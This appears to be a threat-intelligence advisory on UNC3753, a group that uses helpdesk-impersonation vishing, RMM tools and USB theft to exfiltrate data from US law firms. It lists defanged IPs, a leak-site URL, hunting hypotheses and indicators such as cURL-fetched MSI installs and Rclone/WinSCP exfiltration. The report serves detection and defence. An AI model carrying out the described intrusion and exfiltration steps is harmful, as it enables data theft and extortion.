Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms
The financially motivated threat cluster UNC3753 is conducting a fast-paced data theft and extortion campaign against US legal and professional services. The group leverages vishing and IT helpdesk impersonation to trick targets into installing legitimate RMM and screen-sharing tools, enabling rapid data exfiltration from corporate repositories and VDI environments. Notably, the campaign also involves suspected physical intrusions where actors use USB media to steal data directly from endpoints.
- ip174[.]169[.]162[.]62Suspected UNC3753 infrastructure IP address
- ip192[.]236[.]146[.]173Suspected UNC3753 infrastructure IP address
- ip192[.]236[.]147[.]131Suspected UNC3753 infrastructure IP address
- ip192[.]236[.]147[.]138Suspected UNC3753 infrastructure IP address
- ip192[.]236[.]154[.]158Suspected UNC3753 infrastructure IP address
- ip193[.]141[.]60[.]212Suspected UNC3753 infrastructure IP address
- ip64[.]94[.]84[.]97Suspected UNC3753 infrastructure IP address
- urlhxxps://business-data-leaks[.]comLEAKEDDATA data leak site (DLS) used by UNC3753 for extortion
Detection / HunterGoogle
What Happened
A cybercriminal group known as UNC3753 is targeting US law firms and professional services to steal sensitive data and demand ransom payments. The attackers call employees, pretending to be IT support, and trick them into installing remote access software on their computers. This allows the hackers to quickly search for and steal confidential legal and financial documents, sometimes within a single day. In some cases, attackers have even physically entered offices posing as technicians to steal data using USB drives. Organizations should train employees to verify IT requests and strictly control physical and remote access to their networks.
Key Takeaways
- UNC3753 targets US legal and professional services using IT helpdesk impersonation and voice phishing (vishing).
- Attackers trick victims into installing legitimate RMM tools (AnyDesk, Bomgar, SuperOps) and screen-sharing utilities to bypass automated boundary security.
- The threat group exhibits a fast-tempo operational model, often completing data exfiltration within a single business day.
- Suspected physical intrusions involve actors posing as IT technicians to exfiltrate data directly via USB drives.
- Extortion tactics involve aggressive 3-day deadlines and threats to publish stolen data on the LEAKEDDATA leak site.
Affected Systems
- Windows
- Virtual Desktop Infrastructure (VDI)
- Bring Your Own Device (BYOD) endpoints
- iManage
- OneDrive
- SharePoint
Attack Chain
The attack begins with benign, invoice-themed emails to establish a pretext, followed by vishing calls where actors impersonate IT helpdesk staff. Targets are socially engineered into hosting screen-sharing sessions and downloading RMM tools like AnyDesk or SuperOps, often receiving links via Privnote. Once access is established, attackers pivot from BYOD endpoints to corporate VDI environments, enumerate directories, and stage sensitive documents. Finally, data is exfiltrated using tools like WinSCP, Rclone, or browser-based uploads to actor-controlled cloud storage, followed by aggressive extortion demands.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: Yes
- Platforms: Google SecOps
Google SecOps provides detection rules for this activity under the Mandiant Intel Emerging Threats rule pack, specifically targeting MSI downloads via cURL and suspected Rclone exfiltration.
Detection Engineering Assessment
EDR Visibility: High — EDR solutions can monitor the execution of RMM tools, cURL commands downloading MSI files, and unusual file staging activity in user directories. Network Visibility: Medium — Network monitoring can detect high-volume SSH/FTP transfers (WinSCP/Rclone) and connections to unauthorized file-sharing APIs, though legitimate RMM traffic may blend in. Detection Difficulty: Moderate — The heavy reliance on legitimate RMM tools, screen-sharing applications, and BYOD environments makes it challenging to distinguish malicious activity from normal IT support operations without behavioral context.
Required Log Sources
- Process Creation (Event ID 4688 / Sysmon 1)
- Network Connections (Sysmon 3)
- Firewall Logs
- Application Logs (iManage, SharePoint)
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Consider hunting for instances of cURL executing to download MSI files, followed immediately by msiexec execution, which may indicate RMM agent staging. | Process Creation | Execution | Low |
| Evaluate whether unusual volumes of data are being transferred via SSH (Port 22) or FTP utilities like WinSCP from internal VDI nodes to external IP addresses. | Network Flow / Firewall Logs | Exfiltration | Medium |
| If you have visibility into application logs, consider hunting for rapid file searches, search-term spikes, or mass downloads in document repositories like iManage or SharePoint. | Application Logs | Collection | Medium |
Control Gaps
- Lack of strict physical access controls for visitors
- Permissive BYOD policies allowing unmanaged devices to access VDI without conditional access
- Unrestricted execution of portable RMM tools and screen-sharing applications
Key Behavioral Indicators
- cURL downloading MSI files
- Execution of portable WinSCP or Rclone binaries
- Staging of sensitive files (W-2, W-9, 1099) in user Downloads or Roaming profile directories
- Use of Privnote for internal communications
False Positive Assessment
- Medium. The threat actors heavily abuse legitimate administrative tools (AnyDesk, WinSCP, cURL) and screen-sharing applications (Zoom, Teams), which are commonly used by actual IT support staff, potentially leading to false positives during behavioral hunting.
Recommendations
Immediate Mitigation
- Verify against your organization's incident response runbook and team escalation paths before acting.
- Consider auditing corporate environments to block the installation and execution of unauthorized remote monitoring, management, and support utilities.
- Evaluate whether to disable read/write capabilities for all external USB mass storage devices via GPO or MDM.
Infrastructure Hardening
- If supported by your architecture, implement remote access conditional access policies to ensure only corporate-owned devices can authenticate to VDI or VPN.
- Consider enforcing application control policies (e.g., Windows Defender Application Control) to restrict the execution of non-approved binaries.
- Evaluate implementing strict BYOD authentication controls, requiring MFA step-up queries when accessing VDI nodes.
User Protection
- Consider implementing multi-factor authentication (MFA) on business-critical data repository applications, such as iManage.
- If applicable, restrict interactive screen-control features within authorized virtual meeting platforms like Zoom and Teams.
Security Awareness
- Consider conducting user awareness training specifically tailored to vishing and IT helpdesk impersonation tactics.
- Evaluate implementing rigid out-of-band identity verification controls for all external contractors, technical staff, and facilities visitors.
- Consider enforcing a policy requiring physical technical service personnel to be escorted by a corporate supervisor at all times.
MITRE ATT&CK Mapping
- T1566.004 - Phishing: Spearphishing Voice
- T1133 - External Remote Services
- T1204.002 - User Execution: Malicious File
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1059.003 - Command and Scripting Interpreter: Windows Command Shell
- T1569.002 - System Services: Service Execution
- T1053.005 - Scheduled Task/Job: Scheduled Task
- T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys
- T1036.005 - Masquerading: Match Legitimate Name or Location
- T1553.002 - Subvert Trust Controls: Code Signing
- T1562.001 - Impair Defenses: Disable or Modify Tools
- T1070.001 - Indicator Removal: Clear Windows Event Logs
- T1003.001 - OS Credential Dumping: LSASS Memory
- T1003.002 - OS Credential Dumping: Security Account Manager
- T1083 - File and Directory Discovery
- T1135 - Network Share Discovery
- T1046 - Network Service Discovery
- T1219 - Remote Access Software
- T1021.001 - Remote Services: Remote Desktop Protocol
- T1021.004 - Remote Services: SSH
- T1005 - Data from Local System
- T1572 - Protocol Tunneling
- T1020 - Automated Exfiltration
- T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage
- T1052.001 - Exfiltration Over Physical Medium
- T1486 - Data Encrypted for Impact
Additional IOCs
- Command Lines:
- Purpose: Download and silently install SuperOps RMM agent via cURL | Tools:
curl,msiexec| Stage: Execution
- Purpose: Download and silently install SuperOps RMM agent via cURL | Tools:
